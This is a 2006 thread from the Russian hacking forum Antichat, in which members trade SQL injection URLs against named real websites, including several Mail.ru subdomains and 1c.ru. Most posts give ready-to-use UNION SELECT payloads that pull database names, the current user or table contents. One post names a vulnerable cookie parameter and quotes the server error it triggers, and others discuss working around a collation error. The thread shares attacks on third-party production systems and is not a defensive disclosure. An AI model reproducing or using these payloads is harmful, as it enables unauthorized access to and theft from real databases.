Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Тема: Sql иньекция на Mail.ru! |
04.01.2006, 22:11
|
|
Участник форума
Регистрация: 15.09.2005
Сообщений: 115
Провел на форуме:
495113
Репутация:
48
|
|
Тема: Sql иньекция на Mail.ru!
Последний раз редактировалось xdx; 04.01.2006 в 22:13..
|
|
|
04.01.2006, 22:14
|
|
Участник форума
Регистрация: 15.09.2005
Сообщений: 115
Провел на форуме:
495113
Репутация:
48
|
|
или уш вот -) http://realty.mail.ru/main/sale/id_1'www.antichat.ru-FOREVA'/results.aspx
|
|
|
|
04.01.2006, 22:18
|
|
Участник форума
Регистрация: 15.09.2005
Сообщений: 115
Провел на форуме:
495113
Репутация:
48
|
|
лень создавать тему и в топку -) http://www.1c.ru/partwebs/partwebs.jsp?city=www.antichat.ru'%20union%20selec t%20DB_NAME(1),CURRENT_USER--
|
|
|
|
04.01.2006, 22:49
|
|
Участник форума
Регистрация: 15.09.2005
Сообщений: 115
Провел на форуме:
495113
Репутация:
48
|
|
Щас проверим 
РАБОТАЕТ не так ссылку написал
http://www.1c.ru/partwebs/partwebs.jsp?city=antichat.ru'%20union%20select%20 DB_NAME(0),CURRENT_USER--
Вот работает
http://realty.mail.ru/main/sale/id_1'/results.aspx
после id_1 НАДО чтоб он написал ' а он не пишет
Последний раз редактировалось xdx; 04.01.2006 в 22:55..
|
|
|
|
05.06.2006, 22:35
|
|
Познающий
Регистрация: 27.03.2006
Сообщений: 86
Провел на форуме:
972602
Репутация:
52
|
|
вот нашел еще одну sql иньекцию в mail.ru
http://top.mail.ru/stat?url=www.orel.ru'%20UNION%20SELECT%20*%20FROM% 20pages/*
|
|
|
|
01.07.2006, 02:37
|
|
Members of Antichat - Level 5
Регистрация: 27.01.2006
Сообщений: 258
Провел на форуме:
6127131
Репутация:
774
|
|
SQL-INJECTION на soft.mail.ru.
Уязвимость в cookies на страницах:
Код:
index.php, interview_list.php, search_result_header.php, softclub-main.php.
Уязвимый параметр - OP_ID= '.
Ошибка:
Код:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/test.allsoft.ru/aux/bokovik/opinion.inc on line 84
__________________
Завтра будет.Лучше.
|
|
|
|
01.07.2006, 05:24
|
|
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
Провел на форуме:
7426415
Репутация:
1398
|
|
А что линк убрал?
|
|
|
|
01.07.2006, 05:26
|
|
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
Провел на форуме:
7426415
Репутация:
1398
|
|
Сообщение от Dagon
вот нашел еще одну sql иньекцию в mail.ru
http://top.mail.ru/stat?url=www.orel.ru'%20UNION%20SELECT%20*%20FROM% 20pages/*
Я помню ещё с киборгом смотрели. Затряли на кодировке.
Failed to get record: Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'
|
|
|
|
01.07.2006, 12:50
|
|
Banned
Регистрация: 20.06.2005
Сообщений: 880
Провел на форуме:
4610226
Репутация:
1332
|
|
статью мою почитай
|
|
|
|
01.07.2006, 17:31
|
|
Banned
Регистрация: 06.06.2006
Сообщений: 944
Провел на форуме:
3986705
Репутация:
1403
|
|
http://top.mail.ru/stat?url=999%27+union+select+1,2,3,4,5,6,7,8,9,10, 11,12,13,14,15/*
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
